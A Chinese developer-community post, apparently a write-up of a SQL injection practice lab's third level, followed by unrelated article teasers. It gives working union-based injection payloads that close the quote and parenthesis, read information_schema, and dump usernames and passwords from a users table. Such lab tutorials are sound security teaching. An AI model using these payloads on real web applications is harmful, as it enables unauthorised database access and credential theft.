sql注入第三关-开发者社区

这不仅需要手动闭合单引号还得手动闭合但括号。

可以猜测出原本的sql查询语句为：select * from table where id = ('$id')；

所以我们插入的内容到sql语句后为：('1')--+')

整理之前学习的sql注入思路：
1、通过get手动传参，判断是否有查询数据库的操作。

2、判断是否存在注入点。输入1，能查；输入1'，报错；输入1'--+能查，则存在字符型注入。如果是存在数值型注入，输入带有单引号或者双引号则会存在报错，直接注入即可。

3、判断当前查询语句能返回多少列结果，使用order by 数字判断。然后将参数值设置为不合理的值如-1，爆出显示位。
4、然后就可以做联合查询了如：/id=-1' union select 1,database(),version()--+（爆出当前使用数据库名如security）
5、爆出档期按数据库名后，就可以利用mysql的information_schema数据库（相当目录系统）里的tables表和columns爆出security的表表名，表里对应的字段名.
?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
6、查询数据
?id=-1' union select 1,2,group_concat(username ,id , password) from users--+

CTF流量分析神器CTF-NetA：新手也能3分钟上手的实战指南

还在为CTF比赛中的流量分析头疼吗？面对海量的网络数据包，传统工具操作复杂、学习成本高，让许多安全新手望而却步。今天要介绍的CTF-NetA流量分析工具，正是为解决这一痛点而生。【免费下载链接】CTF-NetA 项目地址: https://gi…

李华

游戏库管理革命：插件增强如何让你的游戏体验更智能

游戏库管理革命：插件增强如何让你的游戏体验更智能【免费下载链接】PlayniteExtensionsCollection Collection of extensions made for Playnite. 项目地址: https://gitcode.com/gh_mirrors/pl/PlayniteExtensionsCollection 想象一下，当你打开…

李华

Easy-Scraper智能数据采集：零基础快速上手完整指南

Easy-Scraper智能数据采集：零基础快速上手完整指南【免费下载链接】easy-scraper Easy scraping library 项目地址: https://gitcode.com/gh_mirrors/ea/easy-scraper 还在为复杂的网页数据提取而烦恼吗？传统爬虫工具需要掌握繁琐的技术细节&…

李华

如何一劳永逸解决Windows应用程序依赖问题：VC++运行库终极解决方案

如何一劳永逸解决Windows应用程序依赖问题：VC运行库终极解决方案【免费下载链接】vcredist AIO Repack for latest Microsoft Visual C Redistributable Runtimes 项目地址: https://gitcode.com/gh_mirrors/vc/vcredist 你是否曾遇到过这种情况&#xff1a…

李华

深蓝词库转换：从新手到专家的20种输入法格式互通指南

深蓝词库转换：从新手到专家的20种输入法格式互通指南【免费下载链接】imewlconverter ”深蓝词库转换“ 一款开源免费的输入法词库转换程序项目地址: https://gitcode.com/gh_mirrors/im/imewlconverter 还在为不同输入法之间的词库不兼容而烦恼吗&#xf…

李华

GLM-TTS - 自然、富有情感和表现力的语音克隆/文本转语音系统支持批量生成支持50系显卡一键整合包下载

GLM-TTS 是智谱AI开源的一个新型的文本转语音（TTS）系统，它能在“零样本”条件下模仿声音，在极少的语音样本模仿声音，生成自然、有情绪的语音，并且让合成语音更有情感和表现力。它的特点是可控、自然、支持实…